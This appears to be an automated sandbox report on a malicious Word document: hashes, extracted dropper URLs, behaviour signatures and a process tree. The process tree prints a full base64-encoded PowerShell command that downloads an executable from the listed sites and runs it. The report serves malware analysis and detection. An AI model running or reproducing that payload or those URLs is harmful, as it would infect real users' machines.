Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 02:20

General

  • Target

    85b92183de7b6dd1cb319e8ceb6fad3a_JaffaCakes118.doc

  • Size

    164KB

  • MD5

    85b92183de7b6dd1cb319e8ceb6fad3a

  • SHA1

    a31fabbdc0e16ceeff3a7c4ae7619934e98b4b76

  • SHA256

    27965403597d9dce6ba0fbc8d3f907fcf228898f52db58015a628f15335efcc4

  • SHA512

    27caebbd134fce7b07fe7503bba05a0ca446059c17605e2f2470c2d35a743d9158d34bf5f65bfcf1174e4481d56d04375601c9608aeb20d56eaefbd4d330fb2d

  • SSDEEP

    3072:h77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qyTl7IlSeAvMnyor/6GNRj8dK:h77HUUUUUUUUUUUUUUUUUUUT52Vzl7Uj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://programmephenix.com/wp-content/languages/kjdx0ls2/

exe.dropper

http://axletime.com/wp-admin/r0gmx40208/

exe.dropper

http://5elements-development.com/wp-content/uoesp16/

exe.dropper

http://bestphotographytnj.com/rrm9/lm83yx518/

exe.dropper

http://citilinesholdings.com/wp/cysk9wh832/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85b92183de7b6dd1cb319e8ceb6fad3a_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
      powErSHell -e JABFADQANgA1ADgANgAyADEAPQAnAFEANgA0ADUANQAyADcAJwA7ACQAdwA1ADQANwA0ADMAOAAzACAAPQAgACcAOQA3ADQAJwA7ACQAbwA2ADYAMAAxAF8APQAnAHoAXwAyADMAMAA0ADYAMwAnADsAJABDADUAMQAyADAANQA0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3ADUANAA3ADQAMwA4ADMAKwAnAC4AZQB4AGUAJwA7ACQAUwA4ADkANAA5ADkANAA1AD0AJwBIADIAOAA5ADAANwBfADcAJwA7ACQAbAAyADUAXwBfADMAXwA9AC4AKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AGUAQgBjAGAAbABJAGUAYABOAFQAOwAkAHcAMgAwAF8ANgBfADUAPQAnAGgAdAB0AHAAOgAvAC8AcAByAG8AZwByAGEAbQBtAGUAcABoAGUAbgBpAHgALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBsAGEAbgBnAHUAYQBnAGUAcwAvAGsAagBkAHgAMABsAHMAMgAvAEAAaAB0AHQAcAA6AC8ALwBhAHgAbABlAHQAaQBtAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHIAMABnAG0AeAA0ADAAMgAwADgALwBAAGgAdAB0AHAAOgAvAC8ANQBlAGwAZQBtAGUAbgB0AHMALQBkAGUAdgBlAGwAbwBwAG0AZQBuAHQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG8AZQBzAHAAMQA2AC8AQABoAHQAdABwADoALwAvAGIAZQBzAHQAcABoAG8AdABvAGcAcgBhAHAAaAB5AHQAbgBqAC4AYwBvAG0ALwByAHIAbQA5AC8AbABtADgAMwB5AHgANQAxADgALwBAAGgAdAB0AHAAOgAvAC8AYwBpAHQAaQBsAGkAbgBlAHMAaABvAGwAZABpAG4AZwBzAC4AYwBvAG0ALwB3AHAALwBjAHkAcwBrADkAdwBoADgAMwAyAC8AJwAuAFMAcABsAEkAdAAoACcAQAAnACkAOwAkAFUAOAAwADUAMgA3ADYAMgA9ACcAdQAzADcANwA3ADcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE8AMwA5ADUANwAxACAAaQBuACAAJAB3ADIAMABfADYAXwA1ACkAewB0AHIAeQB7ACQAbAAyADUAXwBfADMAXwAuAGQATwBXAE4ATABPAEEAZABGAEkAbABlACgAJABPADMAOQA1ADcAMQAsACAAJABDADUAMQAyADAANQA0ACkAOwAkAG4AOQA2ADcAXwA4ADYAPQAnAFQANAA0ADUAXwA2ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQwA1ADEAMgAwADUANAApAC4ATABFAE4AZwB0AGgAIAAtAGcAZQAgADMANwA0ADIAMAApACAAewAmACgAJwBJACcAKwAnAG4AdgAnACsAJwBvAGsAZQAtAEkAJwArACcAdABlAG0AJwApACAAJABDADUAMQAyADAANQA0ADsAJABzADQAMgAzADMAMwAwADEAPQAnAFoAMQAyADQAMwA1ADkAMQAnADsAYgByAGUAYQBrADsAJABtADIAMAAzADMAMgAwADQAPQAnAG0AOQAxAF8AOQAxADQANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABwADAAOAA3ADUAMwA9ACcAQwBfADIANQA4ADkAXwA4ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      0b5498d6e7bbb1de48876d3869f195f0

      SHA1

      2d8585484892bc10738a7b1593c8e1f330edd926

      SHA256

      a83d1446e1a75247ac4ee279bb5212d9a009a8eabe91352fbee1e6fa14d1c41c

      SHA512

      2efac4de9fdb8339fce08be360390e93c9c751b382e257e76423e02cb860dddcf4a49d8d8a18e38b9fa7d148fc88573a74fbc687d301e91e1a90f7d971cbf0a8

    • memory/2164-16-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-50-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-8-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-7-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-9-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-10-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-12-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-18-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-52-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-2-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2164-13-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-17-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-14-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-51-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2164-30-0x0000000070B5D000-0x0000000070B68000-memory.dmp

      Filesize

      44KB

    • memory/2164-31-0x0000000000470000-0x0000000000570000-memory.dmp

      Filesize

      1024KB

    • memory/2164-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2164-0-0x000000002FC51000-0x000000002FC52000-memory.dmp

      Filesize

      4KB

    • memory/2944-25-0x00000000027E0000-0x00000000027E8000-memory.dmp

      Filesize

      32KB

    • memory/2944-24-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB